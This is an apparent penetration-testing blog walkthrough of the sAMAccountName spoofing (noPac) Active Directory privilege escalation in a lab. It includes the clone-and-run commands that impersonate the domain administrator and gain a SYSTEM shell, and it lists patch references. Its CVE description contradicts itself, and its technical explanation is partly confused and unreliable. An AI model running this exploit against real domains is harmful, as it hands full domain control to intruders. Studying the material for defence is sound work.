Database Hacking, Red Teaming

Windows Privilege Escalation: sAMAccountName Spoofing

This post discusses how CVE-2021-42278 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any normal Domain user)

Description: Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.

Release Date: Nov 9, 2021

Impact: Elevation of Privilege

Severity: Important

CVSS score: 8.8

Pentest Lab setup

In our lab setup, we use a Kali VM as the attacker machine, and a Windows domain controller (running on vulnerable Windows platforms) serves as the target system. This domain controller remains unpatched since November 9, 2021, which makes it vulnerable to exploitation.

Next, we will create a user with normal domain user privileges in the test Domain Controller lab setup. This step is essential to simulate a low-privileged user scenario.

To check user details on the Domain Controller, run the following command. As you can see, the user appears as a normal domain user (highlighted in red), confirming the privilege level.

net user sakshi

Exploitation

Now on your attacker system, which is Kali VM, you have to clone the exploit from the git repository provided below.

git clone https://github.com/Ridter/noPac

After cloning the repo https://github.com/Ridter/noPac, navigate to the noPac folder

cd noPac
ls -al

And then execute the command

python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap

This CVE represents a security bypass vulnerability caused by Kerberos’s PAC confusion and the impersonation of domain controllers.

It allows potential attackers to impersonate domain controllers by requesting TGTs from Kerberos without a PAC. Consequently, the attacker impersonates a highly privileged user as soon as Kerberos issues the TGT without a PAC.

To achieve this, you configure the altSecurityIdentities attribute to make the domain controller add a PAC when it receives a service ticket (ST) request using a TGT without a PAC.

This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] to impersonate that user.

As a result, the command execution on the attacker machine (Kali VM) displays that it has acquired "NT AUTHORITY\SYSTEM" privileges.

Mitigation

KB5008602 – https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7

KB5008380 – https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041

References:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42287

Author details: Amit Kishor is having 10 plus years of Network Security experience with expertise on multiple Firewall products as well as SaaS products.  Contact on LinkedIn